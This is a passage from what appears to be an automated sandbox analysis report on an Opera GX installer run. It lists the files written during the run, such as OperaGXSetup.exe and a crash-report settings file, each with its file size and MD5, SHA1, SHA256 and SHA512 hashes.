                                                                                                                76009292251748e2c4cc6f21cfa9b15f1a7e7d0401baf6a0755fb5362c996138b34d6499da5255fb1cfae8b22d1f0b0f9bc8a2528b0e57b1353e9ab8a56ba8ea

                                                                                                              • C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports\settings.dat

                                                                                                                Filesize

                                                                                                                40B

                                                                                                                MD5

                                                                                                                168fde964b137ba3a40ad87114c95ade

                                                                                                                SHA1

                                                                                                                c658619f987a23aea9b31d0cb777f760d86308a5

                                                                                                                SHA256

                                                                                                                c71080287937bd80ae7076762cb992f7df7a952f329e136488544b99936c4d6a

                                                                                                                SHA512

                                                                                                                e932c0b294feeb33edc97b130a3556fa19c674227999fbfe58299c5104526fd1fd3a4e6adedd845e8241a6e41fdb8cd1beb50853aac6e94319fbb71c00afbf63

                                                                                                              • C:\Users\Admin\Downloads\OperaGXSetup.exe

                                                                                                                Filesize

                                                                                                                3.1MB

                                                                                                                MD5

                                                                                                                7325120c6108c4cc294bb5467780c747

                                                                                                                SHA1

                                                                                                                43e1551711952c70c7d06d89ee5419c285376d08

                                                                                                                SHA256

                                                                                                                6fc04831897ac811698c7432dcef4577f08f3418e2e981a2f194bd77b25e61a7

                                                                                                                SHA512

                                                                                                                1c4cd44f5d194b1abc9b4654edddedc13cf3314aa5225a3ec656239d876547fc40fa028a91b92cf76cd98250955032291a04e7da2e34fd11a0a87e9bc8ce6743

                                                                                                              • C:\Users\Admin\Downloads\Unconfirmed 905431.crdownload

                                                                                                                Filesize

                                                                                                                89KB

                                                                                                                MD5

                                                                                                                86d68c9cdc087c76e48a453978b63b7c

                                                                                                                SHA1

                                                                                                                b8a684a8f125ceb86739ff6438d283dbafda714a

                                                                                                                SHA256

                                                                                                                df51babc1547a461656eaef01b873a91afcf61851b6f5ef06977e1c33e1b5f32

                                                                                                                SHA512

                                                                                                                dd627f071d994999172048f882ba61407461633634fdb2a3f2b8e6abff6324cc0d78682b5adc4aa4083e5baa1c981687f5c516d9e075eb00dfb58364cee1db04

                                                                                                              • memory/1616-2089-0x00000237E1480000-0x00000237E14A2000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB